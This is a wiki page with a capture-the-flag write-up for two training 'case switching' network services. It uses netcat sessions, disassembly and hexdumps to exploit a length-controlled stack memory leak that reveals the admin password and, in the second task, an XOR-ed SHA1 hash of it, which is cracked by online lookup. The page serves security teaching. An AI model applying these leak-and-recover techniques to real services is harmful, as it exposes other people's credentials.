User Tools

Site Tools


Sidebar

session:solution:mid-ctf_asks1_3

Table of Contents

CTF Tasks 1 & 3

We are presented with two binaries that do almost the same thing. Let's see what exactly:

Task 1

# ./caseservice pass 4242
Server-side debug: login password is set to [example]
 
.... in another terminal:
# nc 127.0.0.1 4242
==============================================
Welcome to the Case Switching service
==============================================
Make your choice (1 or 2):
1. Use service
2. Configure service (only for administrators)
 
1
You selected [1]
Input: input size and then <size> bytes
10         
Bla bla bla
Here you go:
bLABLABL
 
# nc 127.0.0.1 4242
==============================================
Welcome to the Case Switching service
==============================================
Make your choice (1 or 2):
1. Use service
2. Configure service (only for administrators)
 
2
You selected [2]
Configuration is done through a shell
What is the administrator password?
password
Unauthorized login attempted.

So, as the name implies, it switches the case of the input. How does it do that? We turn to the assembly of the function named handle_use where we see this loop.

   0x08048e16 <+116>:	mov    DWORD PTR [ebp-0xc],0x0
   0x08048e1d <+123>:	jmp    0x8048e41 <handle_use+159>
   0x08048e1f <+125>:	lea    edx,[ebp-0x4c6]
   0x08048e25 <+131>:	mov    eax,DWORD PTR [ebp-0xc]
   0x08048e28 <+134>:	add    eax,edx
   0x08048e2a <+136>:	movzx  eax,BYTE PTR [eax]
   0x08048e2d <+139>:	xor    eax,0x20
   0x08048e30 <+142>:	lea    ecx,[ebp-0x4c6]
   0x08048e36 <+148>:	mov    edx,DWORD PTR [ebp-0xc]
   0x08048e39 <+151>:	add    edx,ecx
   0x08048e3b <+153>:	mov    BYTE PTR [edx],al
   0x08048e3d <+155>:	add    DWORD PTR [ebp-0xc],0x1
   0x08048e41 <+159>:	mov    eax,DWORD PTR [ebp-0x4cc]
   0x08048e47 <+165>:	cmp    DWORD PTR [ebp-0xc],eax
   0x08048e4a <+168>:	jb     0x8048e1f <handle_use+125>

So it XORs with 0x20 all the input (regardless of whether the input is made of letters or numbers, symbols, etc). A question you should ask yourself is why does it need to know the input size? Let's try to fiddle with it:

# nc 127.0.0.1 4242
==============================================
Welcome to the Case Switching service
==============================================
Make your choice (1 or 2):
1. Use service
2. Configure service (only for administrators)
 
1
You selected [1]
Input: input size and then <size> bytes
10
A
Here you go:
....... (binary)

Interesting how we get lots of unknown binary data out of it. Maybe there's something useful in there. Let's redirect to a file.

# nc 127.0.0.1 4242 > out
1
255
 
# hexdump -Cv out 
00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
00000120  67 6f 3a 0a 2a 97 20 20  20 20 18 c9 df 9f e9 13  |go:.*.    ......|
00000130  f9 97 ec c8 df 9f 40 20  20 20 27 20 20 20 30 8a  |......@   '   0.|
00000140  e1 97 28 e0 24 28 e0 cf  df 97 20 d9 df 97 20 20  |..(.$(.... ...  |
00000150  20 20 b8 2e 22 20 20 30  20 20 26 71 e9 97 20 94  |  .."  0  &q.. .|
00000160  f4 97 20 20 20 20 20 30  20 20 21 20 20 20 74 8e  |..     0  !   t.|
00000170  f4 97 28 e0 24 28 20 20  20 20 20 20 20 20 31 20  |..(.$(        1 |
00000180  20 20 28 e0 24 28 20 20  20 20 20 20 20 20 74 8e  |  (.$(        t.|
00000190  f4 97 28 e0 24 28 20 20  20 20 a8 cd df 9f 5c f3  |..(.$(    ....\.|
000001a0  e0 97 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |..              |
000001b0  20 20 a8 cd df 9f 50 0a  df 97 20 20 20 20 74 8e  |  ....P...    t.|
000001c0  f4 97 20 20 20 20 20 20  20 20 a8 cd df 9f bb ad  |..        ......|
000001d0  24 28 28 e0 24 28 27 20  20 20 74 c9 df 9f 27 20  |$((.$('   t...' |
000001e0  20 20 20 20 20 20 e3 69  bc 07 09 53 2a 5f a0 5e  |      .i...S*_.^|
000001f0  db a6 56 89 0d eb 4f aa  1f af 45 58 41 4d 50 4c  |..V...O...EXAMPL|
00000200  45 20 20 08 08 08 08 08  08 08 08 08 08 08 08 08  |E  .............|
00000210  08 08 08 08 08 08 a1 a1  a1 a1 a1 a1 a1 a1 a1 a1  |................|
00000220  a1 a1 a1                                          |...|
00000223

There's our password with the switched case! Let's try on the remote system.

# hexdump -Cv out 
00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
00000120  67 6f 3a 0a 2a 97 20 20  20 20 18 c9 df 9f e9 13  |go:.*.    ......|
00000130  f9 97 ec c8 df 9f 40 20  20 20 2c 20 20 20 30 8a  |......@   ,   0.|
00000140  e1 97 28 e0 24 28 e0 cf  df 97 20 d9 df 97 20 20  |..(.$(.... ...  |
00000150  20 20 b8 2e 22 20 20 30  20 20 26 71 e9 97 20 94  |  .."  0  &q.. .|
00000160  f4 97 20 20 20 20 20 30  20 20 21 20 20 20 74 8e  |..     0  !   t.|
00000170  f4 97 28 e0 24 28 20 20  20 20 20 20 20 20 31 20  |..(.$(        1 |
00000180  20 20 28 e0 24 28 20 20  20 20 20 20 20 20 74 8e  |  (.$(        t.|
00000190  f4 97 28 e0 24 28 20 20  20 20 a8 cd df 9f 5c f3  |..(.$(    ....\.|
000001a0  e0 97 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |..              |
000001b0  20 20 a8 cd df 9f 50 0a  df 97 20 20 20 20 74 8e  |  ....P...    t.|
000001c0  f4 97 20 20 20 20 20 20  20 20 a8 cd df 9f bb ad  |..        ......|
000001d0  24 28 28 e0 24 28 2c 20  20 20 74 c9 df 9f 27 20  |$((.$(,   t...' |
000001e0  20 20 20 20 20 20 68 0e  5b fd 7b 7d 73 03 bc ac  |      h.[.{}s...|
000001f0  0a 3f 60 6f 4e 46 f9 c7  85 57 49 4e 54 45 4c 4c  |.?`oNF...WINTELL|
00000200  49 47 45 4e 43 45 20 20  08 08 08 08 08 08 08 08  |IGENCE  ........|
00000210  08 08 08 08 08 08 a1 a1  a1 a1 a1 a1 a1 a1 a1 a1  |................|
00000220  a1 a1 a1                                          |...|
00000223

So the password seems to be “wintelligence” but note that “EXAMPLE” in the first case was at offset 0x1fa. At 0x1fa in the second listing is “I” from “INTELLIGENCE” Trying “intelligence” works and we are able to log in.

Task 3

This task is supposedly more secure. Let's see just how secure by doing almost the same thing as before through hexdump

# nc 127.0.0.1 4242 > out
1
255
 
# hexdump -Cv out 
00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
00000120  67 6f 3a 0a 2a df af 1f  aa 4f a0 df 9a 97 74 8e  |go:.*....O....t.|
00000130  f4 97 20 e0 24 28 20 30  22 20 48 e1 24 28 0d cc  |.. .$( 0" H.$(..|
00000140  e1 97 68 98 f4 97 20 20  20 20 68 c9 df 9f e9 13  |..h...    h.....|
00000150  f9 97 fc c8 df 9f 40 20  20 20 27 20 20 20 30 8a  |......@   '   0.|
00000160  e1 97 20 20 20 20 e0 cf  df 97 20 d9 df 97 20 20  |..    .... ...  |
00000170  20 20 b8 2e 22 20 20 30  20 20 26 71 e9 97 31 20  |  .."  0  &q..1 |
00000180  20 20 20 90 dd 97 20 30  20 20 21 20 20 20 74 8e  |   ... 0  !   t.|
00000190  f4 97 28 e0 24 28 20 20  20 20 20 20 20 20 ae 9a  |..(.$(        ..|
000001a0  e1 97 28 e0 24 28 20 20  20 20 20 20 20 20 74 8e  |..(.$(        t.|
000001b0  f4 97 28 e0 24 28 20 20  20 20 58 cd df 9f 5c f3  |..(.$(    X...\.|
000001c0  e0 97 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |..              |
000001d0  20 20 58 cd df 9f 50 0a  df 97 20 20 20 20 74 8e  |  X...P...    t.|
000001e0  f4 97 20 20 20 20 20 20  20 20 58 cd df 9f 1d ad  |..        X.....|
000001f0  24 28 28 e0 24 28 27 20  20 20 50 c9 df 9f 68 20  |$((.$('   P...h |
00000200  20 20 20 20 20 20 20 20  20 20 20 20 20 20 03 02  |              ..|
00000210  01 0a                                             |..|
00000212

So even if we want 255 bytes it provides considerably less. Why is that? In task 1 handle_use ended like this:

   0x08048e47 <+165>:	cmp    DWORD PTR [ebp-0xc],eax
   0x08048e4a <+168>:	jb     0x8048e1f <handle_use+125>
   0x08048e4c <+170>:	mov    eax,DWORD PTR [ebp-0x4cc]
   0x08048e52 <+176>:	mov    DWORD PTR [esp+0x8],eax
   0x08048e56 <+180>:	lea    eax,[ebp-0x4c6]
   0x08048e5c <+186>:	mov    DWORD PTR [esp+0x4],eax
   0x08048e60 <+190>:	mov    eax,DWORD PTR [ebp+0x8]
   0x08048e63 <+193>:	mov    DWORD PTR [esp],eax
   0x08048e66 <+196>:	call   0x8048ab0 <write@plt>
   0x08048e6b <+201>:	leave  
   0x08048e6c <+202>:	ret  

Task 3 ends it like this:

   0x08048de6 <+162>:	cmp    DWORD PTR [ebp-0xc],eax
   0x08048de9 <+165>:	jb     0x8048dbe <handle_use+122>
   0x08048deb <+167>:	lea    eax,[ebp-0x4c6]
   0x08048df1 <+173>:	mov    DWORD PTR [esp],eax
   0x08048df4 <+176>:	call   0x80489f0 <puts@plt>
   0x08048df9 <+181>:	leave  
   0x08048dfa <+182>:	ret

So instead of a write it does a puts stopping at the first NULL byte. We can bypass this by giving as input the exact amount of bytes until that NULL byte

Let's try 210 bytes.

# nc 127.0.0.1 4242 > out
1
255
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
# hexdump -Cv out 
00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
00000120  67 6f 3a 0a 41 41 41 41  41 41 41 41 41 41 41 41  |go:.AAAAAAAAAAAA|
00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000140  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000150  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000160  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000170  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000180  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000190  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001a0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001b0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001c0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001d0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001e0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001f0  41 41 41 41 41 41 2a 20  20 20 50 c9 df 9f 68 20  |AAAAAA*   P...h |
00000200  20 20 20 20 20 20 20 20  20 20 20 20 20 20 03 02  |              ..|
00000210  01 0a                                             |..|
00000212

We seem to be needing 2 + 8 + 8 + 8 + 2 = 28 bytes to pass the NULL. So we try 238 bytes

# nc 127.0.0.1 4242 > out
1
255
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
# hexdump -Cv out 
00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
00000120  67 6f 3a 0a 41 41 41 41  41 41 41 41 41 41 41 41  |go:.AAAAAAAAAAAA|
00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000140  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000150  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000160  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000170  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000180  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000190  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001a0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001b0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001c0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001d0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001e0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001f0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000200  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000210  41 41 2a 69 bc 07 09 53  2a 5f a0 5e db a6 56 89  |AA*i...S*_.^..V.|
00000220  0d eb 4f 8a 3f 8f 03 02  01 0a                    |..O.?.....|
0000022a

To pass the next null byte we would need 238 + 6 + 8 + 8 + 2 = 262 bytes which is more than what we can send. Before doing assembly investigations let's do some dynamic analysis.

# ltrace ./caseservice_reload pass 4242
__libc_start_main(0x8048fab, 3, 0xbfffee84, 0x80491d0 <unfinished ...>
fopen("pass", "r")                                                                                                                      = 0x804c008
fgets("example\n", 1000, 0x804c008)                                                                                                     = 0xbfffe988
strlen("example\n")                                                                                                                     = 8
printf("Server-side debug: login passwor"..., "example"Server-side debug: login password is set to [example]
)                                                                                = 54
SHA1(0xbfffe988, 7, 0xbfffe970, 72)                                                                                                     = 0xbfffe970
fclose(0x804c008)                                                                                                                       = 0
atoi(0xbffff079, 0, 0x2cb4304e, 1)                                                                                                      = 4242
socket(2, 1, 0)                                                                                                                         = 3
bzero(0xbfffedb8, 16)                                                                                                                   = <void>
inet_addr("000.0.0.0")                                                                                                                  = 0
htons(4242, 16, 0, 1)                                                                                                                   = 0x9210
setsockopt(3, 1, 2, 0xbfffedcc)                                                                                                         = 0
bind(3, 0xbfffedb8, 16, 0xbfffedcc)                                                                                                     = 0
listen(3, 5, 16, 0xbfffedcc)                                                                                                            = 0
accept(3, 0xbfffeda8, 0xbfffedc8, 0xbfffedcc)                                                                                           = 4
fork()                                                                                                                                  = 18145
close(4)                                                                                                                                = 0
accept(3, 0xbfffeda8, 0xbfffedc8, 0xbfffedcc <no return ...>
--- SIGCHLD (Child exited) ---

Notice the SHA1 hash call. If we look into handle_configure we see that the comparison (memcmp) is done against the hash of our input as well. Since the SHA1 of the correct password is done at every program start maybe it's still on the stack. Let's check the hash of “example”

# echo -n "example" | sha1sum 
c3499c2729730a7f807efb8676a92dcb6f8a3f8f  -

If we look at the beginning it doesn't seem to be in our hexdump. But the end is there:

00000220  0d eb 4f 8a 3f 8f 03 02  01 0a                    |..O.?.....|

Why would there be only 3 bytes? Remember the XOR function? 0x6f XOR 0x20 = 0x8f which is exactly the byte preceding these 3 bytes. Extrapolating, we see the whole hash with the first 17 bytes XORED thus easily recoverable.

Let's try remote:

# nc 127.0.0.1 4242 > out
1
255
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
# hexdump -Cv out 
00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
00000120  67 6f 3a 0a 41 41 41 41  41 41 41 41 41 41 41 41  |go:.AAAAAAAAAAAA|
00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000140  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000150  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000160  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000170  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000180  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000190  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001a0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001b0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001c0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001d0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001e0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001f0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000200  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000210  41 41 b6 81 c9 e2 a4 97  34 db b7 e5 d8 88 a8 97  |AA......4.......|
00000220  03 91 b9 33 a9 7e 03 02  01 0a                    |...3.~....|
0000022a

The interesting part is “b6 81 c9 e2 a4 97 34 db b7 e5 d8 88 a8 97 03 91 b9 33 a9 7e”. XORing the first bytes as discussed yields the hash: 96a1e9c284b714fb97c5f8a888b723b19933a97e Searching for this hash on google yields the password “horizonward” which works.

session/solution/mid-ctf_asks1_3.txt · Last modified: 2020/07/19 12:49 (external edit)